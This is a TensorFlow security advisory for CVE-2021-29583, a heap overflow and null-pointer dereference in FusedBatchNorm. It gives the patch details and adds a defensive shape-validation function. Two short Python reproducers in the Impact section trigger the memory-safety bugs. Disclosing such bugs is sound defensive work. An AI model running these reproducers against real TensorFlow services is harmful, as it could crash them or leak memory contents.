## TFSA-2021-072: Heap buffer overflow and undefined behavior in `FusedBatchNorm`

### CVE Number
CVE-2021-29583

### Impact
The implementation of `tf.raw_ops.FusedBatchNorm` is vulnerable to a heap buffer
overflow:

```python
import tensorflow as tf

x = tf.zeros([10, 10, 10, 6], dtype=tf.float32)
scale = tf.constant([0.0], shape=[1], dtype=tf.float32)
offset = tf.constant([0.0], shape=[1], dtype=tf.float32)
mean = tf.constant([0.0], shape=[1], dtype=tf.float32)
variance = tf.constant([0.0], shape=[1], dtype=tf.float32)
epsilon = 0.0
exponential_avg_factor = 0.0
data_format = "NHWC"
is_training = False

tf.raw_ops.FusedBatchNorm(
    x=x, scale=scale, offset=offset, mean=mean, variance=variance,
    epsilon=epsilon, exponential_avg_factor=exponential_avg_factor,
    data_format=data_format, is_training=is_training)
```

If the tensors are empty, the same implementation can trigger undefined behavior
by dereferencing null pointers:

```python
import tensorflow as tf
import numpy as np

x = tf.zeros([10, 10, 10, 1], dtype=tf.float32)
scale = tf.constant([], shape=[0], dtype=tf.float32)
offset = tf.constant([], shape=[0], dtype=tf.float32)
mean = tf.constant([], shape=[0], dtype=tf.float32)
variance = tf.constant([], shape=[0], dtype=tf.float32)
epsilon = 0.0
exponential_avg_factor = 0.0
data_format = "NHWC"
is_training = False

tf.raw_ops.FusedBatchNorm(
    x=x, scale=scale, offset=offset, mean=mean, variance=variance,
    epsilon=epsilon, exponential_avg_factor=exponential_avg_factor,
    data_format=data_format, is_training=is_training)
```

The
[implementation](https://github.com/tensorflow/tensorflow/blob/57d86e0db5d1365f19adcce848dfc1bf89fdd4c7/tensorflow/core/kernels/fused_batch_norm_op.cc)
fails to validate that `scale`, `offset`, `mean` and `variance` (the last two
only when required) all have the same number of elements as the number of
channels of `x`. This results in heap out-of-bounds reads when the buffers
backing these tensors are indexed past their boundary.

If the tensors are empty, the validation mentioned in the above paragraph would
also trigger and prevent the undefined behavior.

### Patches
We have patched the issue in GitHub commit
[6972f9dfe325636b3db4e0bc517ee22a159365c0](https://github.com/tensorflow/tensorflow/commit/6972f9dfe325636b3db4e0bc517ee22a159365c0).

The fix will be included in TensorFlow 2.5.0. We will also cherry-pick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in the supported range.

### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.

### Attribution
This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu
X-Team.
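
### Added example: pre-call shape check

The element-count validation described under Impact can also be enforced by a caller before the op is invoked on a build that lacks the fix. This is an added example, not TensorFlow's code or the patch itself: `channels_of` and `check_fused_batch_norm_shapes` are hypothetical names, the function works on plain shape tuples, and it assumes `mean` and `variance` are "required" in inference mode or when `exponential_avg_factor` is not 1.0.

```python
from math import prod


def channels_of(x_shape, data_format):
    """Return the channel count of a 4-D input shape."""
    if len(x_shape) != 4:
        raise ValueError(f"x must be 4-D, got shape {tuple(x_shape)}")
    if data_format == "NHWC":
        return x_shape[3]
    if data_format == "NCHW":
        return x_shape[1]
    raise ValueError(f"unsupported data_format {data_format!r}")


def check_fused_batch_norm_shapes(x_shape, scale, offset, mean, variance,
                                  is_training=True, exponential_avg_factor=1.0,
                                  data_format="NHWC"):
    """Return a list of mismatches; an empty list means the call is consistent.

    Arguments other than the flags are shapes (tuples of ints), not tensors.
    """
    channels = channels_of(x_shape, data_format)
    to_check = {"scale": scale, "offset": offset}
    # Assumption: mean/variance are only read in inference mode or when the
    # running average is blended in (exponential_avg_factor != 1.0).
    if not is_training or exponential_avg_factor != 1.0:
        to_check.update(mean=mean, variance=variance)
    problems = []
    for name, shape in to_check.items():
        count = prod(shape)  # element count; 0 for an empty tensor
        if count != channels:
            problems.append(f"{name}: {count} element(s), expected {channels}")
    return problems


# Constructed shapes mirroring the two reproducers in the advisory.
OVERFLOW_CASE = check_fused_batch_norm_shapes(
    (10, 10, 10, 6), (1,), (1,), (1,), (1,),
    is_training=False, exponential_avg_factor=0.0)
EMPTY_CASE = check_fused_batch_norm_shapes(
    (10, 10, 10, 1), (0,), (0,), (0,), (0,),
    is_training=False, exponential_avg_factor=0.0)

if __name__ == "__main__":
    for label, found in (("overflow", OVERFLOW_CASE), ("empty", EMPTY_CASE)):
        print(label, "->", found or "ok")
```

Both reproducer shapes are reported as mismatches on all four parameter tensors, while a training-mode call with empty `mean` and `variance` passes.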